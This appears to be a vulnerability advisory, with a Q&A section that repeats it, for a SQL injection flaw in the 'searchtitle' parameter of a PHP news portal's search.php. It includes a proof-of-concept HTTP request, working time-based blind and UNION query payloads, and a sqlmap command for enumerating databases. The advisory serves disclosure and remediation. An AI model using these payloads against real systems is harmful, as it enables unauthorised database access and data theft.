Projectworlds Best Online News Portal Project V1.0 /search.php SQL Injection

by ADMIN 77 views

Introduction

In this article, we will discuss a critical SQL injection vulnerability found in the '/search.php' file of the 'Best online news portal System' project. This vulnerability allows attackers to inject malicious code from the parameter 'searchtitle' and use it directly in SQL queries without the need for appropriate cleaning or validation. This can lead to unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption.

Affected Product and Vendor

The affected product is the 'Best online news portal project in php', which can be downloaded from the vendor's homepage at https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html. The vulnerable file is '/search.php' and the affected version is V1.0.

Vulnerability Details

The root cause of this issue is that the 'searchtitle' parameter is not properly validated, allowing attackers to inject malicious SQL queries. This can be exploited by attackers to gain unauthorized access to databases, modify or delete data, and access sensitive information.

Impact

The impact of this vulnerability is severe, as it can lead to:

  • Unauthorized database access
  • Sensitive data leakage
  • Data tampering
  • Comprehensive system control
  • Service interruption

Description

During the security review of "Best online news portal System", a critical SQL injection vulnerability was discovered in the '/search.php' file. This vulnerability stems from insufficient user input validation of the 'searchtitle' parameter, allowing attackers to inject malicious SQL queries.

Exploitation

To exploit this vulnerability, an attacker can send a malicious request to the '/search.php' file with a crafted 'searchtitle' parameter. The request can be sent using a tool like Burp Suite or by manually crafting the request.

Proof of Concept

The following is a proof of concept (POC) for this vulnerability:

POST /101news/101news/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://localhost
Connection: close
Referer: http://localhost/101news/101news/news-details.php?nid=5
Cookie: PHPSESSID=r3bt76ge3sjka91e1v4nogtgkm
Upgrade-Insecure-Requests: 1
Priority: u=0, i

searchtitle=111

Vulnerability Type

The vulnerability type is time-based blind and union query.

Vulnerability Payload

The following is a payload for this vulnerability:

---
Parameter: searchtitlePOST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=111' AND (SELECT 9902 FROM (SELECT(SLEEP(5)))MaAl) AND 'fKDn'='fKDn

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: searchtitle=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x576454474f687361594b564c76664e62796848584e504373525072666c5746546a59714250777262,0x7171716b71)-- -
---

Testing and Running with sqlmap Tool

The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:

python sqlmap.py -r a.txt --random-agent --dbs

Conclusion

In conclusion, the 'Best online news portal project in php' has a critical SQL injection vulnerability in the '/search.php' file. This vulnerability can be exploited by attackers to gain unauthorized access to databases, modify or delete data, and access sensitive information. It is essential to patch this vulnerability as soon as possible to ensure system security and protect data integrity.

Recommendations

To prevent this vulnerability, we recommend the following:

  • Validate user input thoroughly
  • Use prepared statements or parameterized queries
  • Use a web application firewall (WAF) to detect and prevent SQL injection attacks
  • Regularly update and patch software to ensure the latest security fixes are applied

Q: What is the affected product and vendor?

A: The affected product is the 'Best online news portal project in php', which can be downloaded from the vendor's homepage at https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html.

Q: What is the vulnerable file and affected version?

A: The vulnerable file is '/search.php' and the affected version is V1.0.

Q: What is the root cause of this issue?

A: The root cause of this issue is that the 'searchtitle' parameter is not properly validated, allowing attackers to inject malicious SQL queries.

Q: What are the potential impacts of this vulnerability?

A: The potential impacts of this vulnerability are:

  • Unauthorized database access
  • Sensitive data leakage
  • Data tampering
  • Comprehensive system control
  • Service interruption

Q: How can this vulnerability be exploited?

A: This vulnerability can be exploited by sending a malicious request to the '/search.php' file with a crafted 'searchtitle' parameter.

Q: What is the proof of concept for this vulnerability?

A: The following is a proof of concept (POC) for this vulnerability:

POST /101news/101news/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://localhost
Connection: close
Referer: http://localhost/101news/101news/news-details.php?nid=5
Cookie: PHPSESSID=r3bt76ge3sjka91e1v4nogtgkm
Upgrade-Insecure-Requests: 1
Priority: u=0, i

searchtitle=111

Q: What are the vulnerability types and payloads?

A: The vulnerability types are time-based blind and union query. The following is a payload for this vulnerability:

---
Parameter: searchtitlePOST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=111' AND (SELECT 9902 FROM (SELECT(SLEEP(5)))MaAl) AND 'fKDn'='fKDn

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: searchtitle=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x576454474f687361594b564c76664e62796848584e504373525072666c5746546a59714250777262,0x7171716b71)-- -
---

Q: How can I test and run with the sqlmap tool?

A: The following is an example of how to test and run with the sqlmap tool:

python sqlmap.py -r a.txt --random-agent --dbs

Q: What are the recommendations to prevent this vulnerability?

A: To prevent this vulnerability, we recommend the following:

  • Validate user input thoroughly
  • Use prepared statements or parameterized queries
  • Use a web application firewall (WAF) to detect and prevent SQL injection attacks
  • Regularly update and patch software to ensure the latest security fixes are applied

By following these recommendations, you can help prevent SQL injection attacks and ensure the security of your web application.